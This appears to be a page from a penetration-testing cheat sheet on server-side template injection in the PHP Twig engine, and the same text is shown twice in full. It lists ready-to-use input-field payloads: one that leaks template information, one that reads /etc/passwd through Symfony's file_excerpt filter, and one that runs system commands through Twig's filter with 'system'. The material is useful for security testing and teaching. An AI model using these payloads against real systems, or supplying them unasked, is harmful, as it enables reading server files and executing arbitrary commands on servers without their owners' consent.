TWIG (EXPLOITATION)

Twig is a template engine for the PHP programming language

INFORMATION DISCLOSURE

root@oco:~$ BROWSER > {targetSite:port}
 input field: {{ _self }}
 * the _self keyword is used to obtain a little information about the current template. however, the amount of information is limited compared to Jinja

LFI

root@oco:~$ BROWSER > {targetSite:port}
 input field: {{ "/etc/passwd"|file_excerpt(1,-1) }}

 * reading local files is not possible using internal functions directly provided by Twig
    - However, the PHP web framework Symfony (https://symfony.com/) defines additional Twig filters such as file_excerpt which can be used to read local files

RCE

root@oco:~$ BROWSER > {targetSite:port}
 input field: {{ ['id'] | filter('system') }}
 * the PHP built-in function system "system" must be used to achieve RCE
    - you can pass an argument to this function by using Twig's "filter" function

PreviousJINJA (EXPLOITATION)NextHANDLEBARS NODEJS (EXPLOITATION)

Last updated 4 months ago

TWIG (EXPLOITATION)

Twig is a template engine for the PHP programming language

INFORMATION DISCLOSURE

root@oco:~$ BROWSER > {targetSite:port}
 input field: {{ _self }}
 * the _self keyword is used to obtain a little information about the current template. however, the amount of information is limited compared to Jinja

LFI

root@oco:~$ BROWSER > {targetSite:port}
 input field: {{ "/etc/passwd"|file_excerpt(1,-1) }}

 * reading local files is not possible using internal functions directly provided by Twig
    - However, the PHP web framework Symfony (https://symfony.com/) defines additional Twig filters such as file_excerpt which can be used to read local files

RCE

root@oco:~$ BROWSER > {targetSite:port}
 input field: {{ ['id'] | filter('system') }}
 * the PHP built-in function system "system" must be used to achieve RCE
    - you can pass an argument to this function by using Twig's "filter" function

PreviousJINJA (EXPLOITATION)NextHANDLEBARS NODEJS (EXPLOITATION)

Last updated 4 months ago